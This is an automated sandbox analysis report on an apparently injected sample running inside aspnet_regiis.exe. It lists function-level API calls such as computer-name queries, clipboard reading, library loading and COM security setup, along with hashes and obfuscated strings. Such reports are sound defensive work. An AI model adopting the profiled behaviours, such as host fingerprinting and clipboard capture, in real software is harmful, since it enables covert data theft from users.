                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: InstalledMemoryPhysicallySystem
                                                                                              • String ID:
                                                                                              • API String ID: 3960555810-0
                                                                                              • Opcode ID: 3eeb1d3ebd6fd179166a25061d9a187e8eb399b1add63d1476a58c09bbcd743c
                                                                                              • Instruction ID: 5e064bcc6815dc6a91f6ea16bf8f57f1c5bc8890e4bebbc20e1d0c42b0a7e9a4
                                                                                              • Opcode Fuzzy Hash: 3eeb1d3ebd6fd179166a25061d9a187e8eb399b1add63d1476a58c09bbcd743c
                                                                                              • Instruction Fuzzy Hash: 7EC17D716047418FD715CF29C4A0766FBE2BF9A304F2886AEC4DB8B792D775A406CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0f8e9ca69f1d7de6af929f3d4726f05a85df8bf43b8290f4757d63af5971c979
                                                                                              • Instruction ID: 0da2172d21731c0909c770dde5283e70ef3ab896c5a5464f2554d6bb594f0f4e
                                                                                              • Opcode Fuzzy Hash: 0f8e9ca69f1d7de6af929f3d4726f05a85df8bf43b8290f4757d63af5971c979
                                                                                              • Instruction Fuzzy Hash: 3491D5B15083418BC715CF2DC89179BBBE2AFE8314F288B2DE4DA87291EB34D545CB46
                                                                                              APIs
                                                                                              • LdrInitializeThunk.NTDLL(72C84250,00000002,00000018,?,?,00000018,?,?,?), ref: 72C80C0E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 196 72c7084b-72c70892 call 72c827b0 199 72c708a0-72c708f2 196->199 199->199 200 72c708f4-72c708fc 199->200 201 72c708fe-72c70904 200->201 202 72c7091b-72c70977 call 72c827b0 200->202 203 72c70910-72c70919 201->203 207 72c70980-72c709d1 202->207 203->202 203->203 207->207 208 72c709d3-72c709dd 207->208 209 72c709df-72c709e4 208->209 210 72c709fb-72c70a32 GetComputerNameExA 208->210 211 72c709f0-72c709f9 209->211 211->210 211->211
                                                                                              APIs
                                                                                              • GetComputerNameExA.KERNELBASE(00000006,2E27282B,?), ref: 72C70A0D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: ComputerName
                                                                                              • String ID: &sjK$+('.
                                                                                              • API String ID: 3545744682-207329785
                                                                                              • Opcode ID: 86b1fd24fdc9d4441d0ac5137c89611837abe314f23d2c60f13df863d243e556
                                                                                              • Instruction ID: 6f1235861b531a77cca3d3dc23432fe9886a14de0b6d862a0054e87559f0ddae
                                                                                              • Opcode Fuzzy Hash: 86b1fd24fdc9d4441d0ac5137c89611837abe314f23d2c60f13df863d243e556
                                                                                              • Instruction Fuzzy Hash: 18513C72650A429BE309CF29CC95762BBF2FFA5314F18865CC097C7791E778A406CB90

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 267 72c6f136-72c6f14a 268 72c6f14c-72c6f14f 267->268 269 72c6f15b-72c6f195 267->269 270 72c6f150-72c6f159 268->270 272 72c6f1a0-72c6f1b2 269->272 270->269 270->270 272->272 273 72c6f1b4-72c6f1b9 272->273 274 72c6f1cd 273->274 275 72c6f1bb-72c6f1bf 273->275 277 72c6f1d0-72c6f207 GetComputerNameExA 274->277 276 72c6f1c0-72c6f1c9 275->276 276->276 278 72c6f1cb 276->278 278->277
                                                                                              APIs
                                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 72C6F1E3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: ComputerName
                                                                                              • String ID: %8#$?26=
                                                                                              • API String ID: 3545744682-1344153340
                                                                                              • Opcode ID: 9b3f50f28e480c90d82f5dcd6057f7dd1418af75d0efaca6e0044819d93d49fd
                                                                                              • Instruction ID: 6d304119a1237eb9786f7c4542cd2333581004b9f31469d1a85e5cfa8e6921de
                                                                                              • Opcode Fuzzy Hash: 9b3f50f28e480c90d82f5dcd6057f7dd1418af75d0efaca6e0044819d93d49fd
                                                                                              • Instruction Fuzzy Hash: B72163705046838BE70A8F29C860762FBB5AF63354F18958DC4D79B282CB78D985CB65

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 279 72c6f128-72c6f195 281 72c6f1a0-72c6f1b2 279->281 281->281 282 72c6f1b4-72c6f1b9 281->282 283 72c6f1cd 282->283 284 72c6f1bb-72c6f1bf 282->284 286 72c6f1d0-72c6f207 GetComputerNameExA 283->286 285 72c6f1c0-72c6f1c9 284->285 285->285 287 72c6f1cb 285->287 287->286
                                                                                              APIs
                                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 72C6F1E3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: ComputerName
                                                                                              • String ID: %8#$?26=
                                                                                              • API String ID: 3545744682-1344153340
                                                                                              • Opcode ID: 09db5e504519007e89bcd2dfc44c2302287dba16441abb240d7de144e4fbc1b0
                                                                                              • Instruction ID: ece25aa39dd631b8e43510ebdf813b5e7ee73412c1169f6c0154bde64473a2d9
                                                                                              • Opcode Fuzzy Hash: 09db5e504519007e89bcd2dfc44c2302287dba16441abb240d7de144e4fbc1b0
                                                                                              • Instruction Fuzzy Hash: B31182B05046428BE309CF29CCA0762FBB5BF56354F18968DC0969B386CB38D985CBA1

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 408 72c49d00-72c49d32 409 72c49d40-72c49d67 408->409 409->409 410 72c49d69-72c49da4 409->410 411 72c49db0-72c49dd5 410->411 411->411 412 72c49dd7-72c49de7 LoadLibraryExW call 72c803c0 411->412 414 72c49dec-72c49e03 412->414
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(B606B008,00000000,FO@A), ref: 72C49DDF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID: FO@A
                                                                                              • API String ID: 1029625771-358558723
                                                                                              • Opcode ID: 22159bb9277931997a51ffb52416d8cd999812cd756abce897ddcde790e2693a
                                                                                              • Instruction ID: 855e4a1af311775f20657b8e4c9f323cfb535de9509070524d656d51f8a4ee8a
                                                                                              • Opcode Fuzzy Hash: 22159bb9277931997a51ffb52416d8cd999812cd756abce897ddcde790e2693a
                                                                                              • Instruction Fuzzy Hash: CD1136703993A58BE314CE21C95076B7FE2AFE6700F188E5CD0C5AB741C73859068B57

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 415 72c4cdd6-72c4cee5 CoInitializeEx 416 72c4cee8-72c4cf4a CoInitializeEx 415->416 417 72c4cf53-72c4cf5d 416->417 417->416 419 72c4cf5f 417->419 419->419
                                                                                              APIs
                                                                                              • CoInitializeEx.OLE32(00000000,00000002), ref: 72C4CDDA
                                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 72C4CF2A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: Initialize
                                                                                              • String ID:
                                                                                              • API String ID: 2538663250-0
                                                                                              • Opcode ID: 33292045ea916f655469d31e86d0610cb1dbffb4af0557dffd0d9b662db14bec
                                                                                              • Instruction ID: 2bd7605f92c93836e5345f21ac382da482e247bd33be420cf10d771203a34174
                                                                                              • Opcode Fuzzy Hash: 33292045ea916f655469d31e86d0610cb1dbffb4af0557dffd0d9b662db14bec
                                                                                              • Instruction Fuzzy Hash: E641C8B5D10B40AFD770EF3D8A0B7167EB4AB05210F508B1DF9E68A6C4E634A4198BD7
                                                                                              APIs
                                                                                              • GetUserDefaultUILanguage.KERNELBASE ref: 72C7A4F2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: DefaultLanguageUser
                                                                                              • String ID:
                                                                                              • API String ID: 95929093-0
                                                                                              • Opcode ID: 4784a34e00c9ae8c0799bf7d747ba309865315089c2cf301b85d5c50d6d1810e
                                                                                              • Instruction ID: ad7e7cbfa7f5206de56e47475dad742c2159738261508c21921c7a0ae31113ec
                                                                                              • Opcode Fuzzy Hash: 4784a34e00c9ae8c0799bf7d747ba309865315089c2cf301b85d5c50d6d1810e
                                                                                              • Instruction Fuzzy Hash: 3C212771E052918FD709CA3DDC94B69BFA2BFA9304F0CC1DCC04997386CA348845CB51
                                                                                              APIs
                                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 72C4CF2A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: Initialize
                                                                                              • String ID:
                                                                                              • API String ID: 2538663250-0
                                                                                              • Opcode ID: 67944168a30ec75285c9d10ffd625cfed7b55b0016a80170ad42b9cfab6677f8
                                                                                              • Instruction ID: 9d353c8d5d1021fc7f8311d77890f0676ce18c92baa8c15c8edb39ca488dd919
                                                                                              • Opcode Fuzzy Hash: 67944168a30ec75285c9d10ffd625cfed7b55b0016a80170ad42b9cfab6677f8
                                                                                              • Instruction Fuzzy Hash: F7F031B59407409FD760EF39C9177567EA1A781600F11CA1DE4DA47785DA345409CBD3
                                                                                              APIs
                                                                                              • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,72C4B84E,00000000,00000001,?,00000000,?,00000000), ref: 72C80BB2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 6833710ae2a77138dc1ab40eb799c1dd7d0e7460b6533b9eec91d0b93f9ba1e9
                                                                                              • Instruction ID: fe426293e0bf0f62aeaebbe8bfb919c2703ed4ca6950bb81a6bf2164fe203e79
                                                                                              • Opcode Fuzzy Hash: 6833710ae2a77138dc1ab40eb799c1dd7d0e7460b6533b9eec91d0b93f9ba1e9
                                                                                              • Instruction Fuzzy Hash: 2BE02B33414251BBD6015E2DAC05F177BA8DFE1724F024C74E80466104E735E811C1A2
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: BlanketProxy
                                                                                              • String ID:
                                                                                              • API String ID: 3890896728-0
                                                                                              • Opcode ID: 08750fc5e330908c5db76b149593e207e3afb89c5c076591d4f81b340fca7296
                                                                                              • Instruction ID: bd6f548c978d4775298cd9cf13b082c32ad726c02bbbf794790d34220c6fe8f4
                                                                                              • Opcode Fuzzy Hash: 08750fc5e330908c5db76b149593e207e3afb89c5c076591d4f81b340fca7296
                                                                                              • Instruction Fuzzy Hash: 67F067B5508702DFD714DF29C5A871ABBE1FB84344F118A1CE49A8B390D7B5A549CF82
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: BlanketProxy
                                                                                              • String ID:
                                                                                              • API String ID: 3890896728-0
                                                                                              • Opcode ID: 625e2b1c78f794673fcd554790523b6f0620305f6424234dd37f42bcfe4a4cc0
                                                                                              • Instruction ID: e24dedf95dddd0db91d4c6c0b449f4a41cc530967a8f35fb284104c16b73d170
                                                                                              • Opcode Fuzzy Hash: 625e2b1c78f794673fcd554790523b6f0620305f6424234dd37f42bcfe4a4cc0
                                                                                              • Instruction Fuzzy Hash: 87F028B4108701CFE350DF29C1A471ABBF5FB85344F10894CE5998B3A1D7B6A949CF82
                                                                                              APIs
                                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 72C4CF8B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeSecurity
                                                                                              • String ID:
                                                                                              • API String ID: 640775948-0
                                                                                              • Opcode ID: 1a8497ab39d82d313b382f1a8abffd138172a2664e8dd7474ac6e29428391dd2
                                                                                              • Instruction ID: cbbc9230206cceaaf54417063b60b7a559c6bf9f26bd4c69d8ba1ff9aead5e60
                                                                                              • Opcode Fuzzy Hash: 1a8497ab39d82d313b382f1a8abffd138172a2664e8dd7474ac6e29428391dd2
                                                                                              • Instruction Fuzzy Hash: DED0C9753C43847BF26486099E63F2432105755F26F704B1DB323FE6C0D9D07504860C
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32 ref: 72C8184C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: ForegroundWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2020703349-0
                                                                                              • Opcode ID: 229ab3240759c00e066dcb89300e8debc20de4a067b8a4481b897ed3e997408e
                                                                                              • Instruction ID: 6300d89dad6c58f2ca0ff596236cbb790365b0d04a81b859fb79832cfac042f5
                                                                                              • Opcode Fuzzy Hash: 229ab3240759c00e066dcb89300e8debc20de4a067b8a4481b897ed3e997408e
                                                                                              • Instruction Fuzzy Hash: B8E012B79812D09FC708CF66D8555743B60AB6E354324591DD242D3341DB31A902CB11
                                                                                              APIs
                                                                                              • RtlFreeHeap.NTDLL(?,00000000,?,72C80BCB,?,72C4B84E,00000000,00000001,?,00000000,?,00000000), ref: 72C7F20E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeHeap
                                                                                              • String ID:
                                                                                              • API String ID: 3298025750-0
                                                                                              • Opcode ID: 2acead75fb8c3fc1e3666a688a5980f95f88c61ec524873457e2c3ea6cef6267
                                                                                              • Instruction ID: 2c46cb4aadfee35dd2b1dabbdb3fdeea993965a4be535134a31450f88728f3cd
                                                                                              • Opcode Fuzzy Hash: 2acead75fb8c3fc1e3666a688a5980f95f88c61ec524873457e2c3ea6cef6267
                                                                                              • Instruction Fuzzy Hash: B1D01232485172EFC6105F19EC19B863B98DF15371F134955A9447B064C720DC92C7D0
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,?,A2E6E197,72C48AFA,929D7C9F), ref: 72C7F1E0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 6b22008a9b5ac05859e3138201c05102d083957e7be6313ca966f21dd10e91d7
                                                                                              • Instruction ID: fed5615e43b099200b3f3545c5adf11d9b168b2640e29d510e4a0f5718e1341c
                                                                                              • Opcode Fuzzy Hash: 6b22008a9b5ac05859e3138201c05102d083957e7be6313ca966f21dd10e91d7
                                                                                              • Instruction Fuzzy Hash: ACC09232086161BFDA106F19EC08FCB3FA8EF663A0F164495B948770B4C760AC93CAD5
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                              • String ID: -$Y$\$e$f$h$k$m$x$z$}
                                                                                              • API String ID: 2832541153-3917866455
                                                                                              • Opcode ID: 71fe16047f5dbde7b1c098668c7dbbc51853c782b60f3af9deb2929bedd23a03
                                                                                              • Instruction ID: 4b390cb418489643dfbc266c5be66bf2b3411dba654251151f1339489fe81c38
                                                                                              • Opcode Fuzzy Hash: 71fe16047f5dbde7b1c098668c7dbbc51853c782b60f3af9deb2929bedd23a03
                                                                                              • Instruction Fuzzy Hash: 7241AD7154C3848FD301AF7DD98A31FBEE19B91204F098A2DE4D986385D67D859CC7A3
                                                                                              APIs
                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 72C6B83C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentExpandStrings
                                                                                              • String ID: +$e$+$e$5F&D$b`$n8l
                                                                                              • API String ID: 237503144-2165861206
